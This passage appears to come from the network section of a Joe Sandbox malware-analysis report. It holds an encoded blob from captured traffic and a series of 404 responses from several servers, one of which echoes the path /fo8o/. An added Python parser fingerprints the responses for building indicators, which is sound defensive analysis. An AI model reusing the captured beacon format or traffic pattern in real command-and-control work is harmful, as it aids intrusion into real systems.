  Data Raw: 55 54 35 74 54 64 4b 58 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d
  Data Ascii: UT5tTdKX=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Thu, 19 Dec 2024 06:50:35 GMT
  Content-Type: text/html
  Content-Length: 548
  Connection: close
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=us-ascii
  Server: Microsoft-HTTPAPI/2.0
  Date: Thu, 19 Dec 2024 06:51:00 GMT
  Connection: close
  Content-Length: 315
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=us-ascii
  Server: Microsoft-HTTPAPI/2.0
  Date: Thu, 19 Dec 2024 06:51:03 GMT
  Connection: close
  Content-Length: 315
  Data Raw / Data Ascii: identical to the 06:51:00 GMT response above
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=us-ascii
  Server: Microsoft-HTTPAPI/2.0
  Date: Thu, 19 Dec 2024 06:51:06 GMT
  Connection: close
  Content-Length: 315
  Data Raw / Data Ascii: identical to the 06:51:00 GMT response above
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=us-ascii
  Server: Microsoft-HTTPAPI/2.0
  Date: Thu, 19 Dec 2024 06:51:09 GMT
  Connection: close
  Content-Length: 315
  Data Raw / Data Ascii: identical to the 06:51:00 GMT response above
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:02 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:05 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:08 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:11 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:26 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
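            The sandbox prints each of the 404 responses above as one fused cell: status line, headers, a "Data Raw" hex dump and a lossy "Data Ascii" rendering (the Ascii view drops the CR/LF bytes, so only the hex can be checked against Content-Length). The Python below is an added example and is not code from the Joe Sandbox report or its tooling. It parses one such record, the 203-byte Apache response copied from the report, verifies that Content-Length matches the decoded bytes, and pulls out the Server banner, the HTML title and the request path that Apache's default 404 body echoes, which is how the /fo8o/ path in that body can be tied to the response. The header names used to split the fused cell are the ones present in these records (an assumption of this example).

```python
"""Parse Joe Sandbox 'HTTP traffic detected' records and sanity-check them.

Added example, not code from the report or from Joe Sandbox. The record below
is the 203-byte Apache 404 quoted in the report; the other records on the page
have the same layout (status line, headers, 'Data Raw' hex, 'Data Ascii').
"""
import re
from dataclasses import dataclass

# The sandbox renders each record with no separator between the status line,
# the headers and the two body renderings, so the split is keyed on the header
# names that occur in these records (assumption: no header value contains one
# of these names followed by ': ').
HEADER_NAMES = ("Date", "Server", "Content-Length", "Connection", "Content-Type")
_SPLIT = re.compile(r"(?=(?:%s|Data Raw|Data Ascii): )" % "|".join(HEADER_NAMES))

# Copied from the report (response dated Thu, 19 Dec 2024 06:53:18 GMT); the
# hex is wrapped across source lines here only for readability.
SAMPLE_RECORD = (
    "HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 06:53:18 GMTServer: Apache"
    "Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1"
    "Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f "
    "49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d "
    "6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 "
    "3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f "
    "74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 "
    "20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 "
    "74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d "
    "6c 3e 0a "
    'Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head>'
    "<title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "
    "/fo8o/ was not found on this server.</p></body></html>"
)


@dataclass
class HttpRecord:
    status: int
    reason: str
    headers: dict
    body: bytes  # decoded from 'Data Raw'; authoritative, unlike 'Data Ascii'


def parse_record(text: str) -> HttpRecord:
    """Split one fused 'HTTP traffic detected' cell into its parts."""
    parts = [p for p in _SPLIT.split(text) if p]
    m = re.match(r"HTTP/\d\.\d (\d{3}) (.*)", parts[0])
    if not m:
        raise ValueError("record does not start with an HTTP status line")
    headers, body = {}, b""
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        value = value.strip()
        if name == "Data Raw":
            body = bytes.fromhex(value)       # fromhex ignores the spaces
        elif name == "Data Ascii":
            continue                          # lossy view of the same bytes
        else:
            headers[name] = value
    return HttpRecord(int(m.group(1)), m.group(2), headers, body)


def content_length_ok(rec: HttpRecord) -> bool:
    """True when the advertised Content-Length matches the dumped body."""
    return int(rec.headers.get("Content-Length", -1)) == len(rec.body)


def body_text(rec: HttpRecord) -> str:
    """Decode the body with the charset from Content-Type, latin-1 as fallback."""
    m = re.search(r"charset=([\w-]+)", rec.headers.get("Content-Type", ""))
    try:
        return rec.body.decode(m.group(1) if m else "latin-1")
    except (LookupError, UnicodeDecodeError):
        return rec.body.decode("latin-1")


def html_title(rec: HttpRecord) -> str:
    m = re.search(r"<title>(.*?)</title>", body_text(rec), re.I | re.S)
    return m.group(1).strip() if m else ""


def requested_path(rec: HttpRecord) -> str:
    """Apache's stock 404 page echoes the request path; recover it."""
    m = re.search(r"The requested URL (\S+) was not found", body_text(rec))
    return m.group(1) if m else ""


def fingerprint(rec: HttpRecord) -> tuple:
    """(status, Server banner, title): enough to tell the decoy pages apart."""
    return (rec.status, rec.headers.get("Server", ""), html_title(rec))


if __name__ == "__main__":
    rec = parse_record(SAMPLE_RECORD)
    print(fingerprint(rec), "length ok:", content_length_ok(rec),
          "path:", requested_path(rec))
```

            Running the parser over every "HTTP traffic detected" record of a report gives a small set of (status, Server, title) fingerprints; on this page the same request path produced three different 404 pages from two server banners, which is worth recording alongside the URL itself when building indicators.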
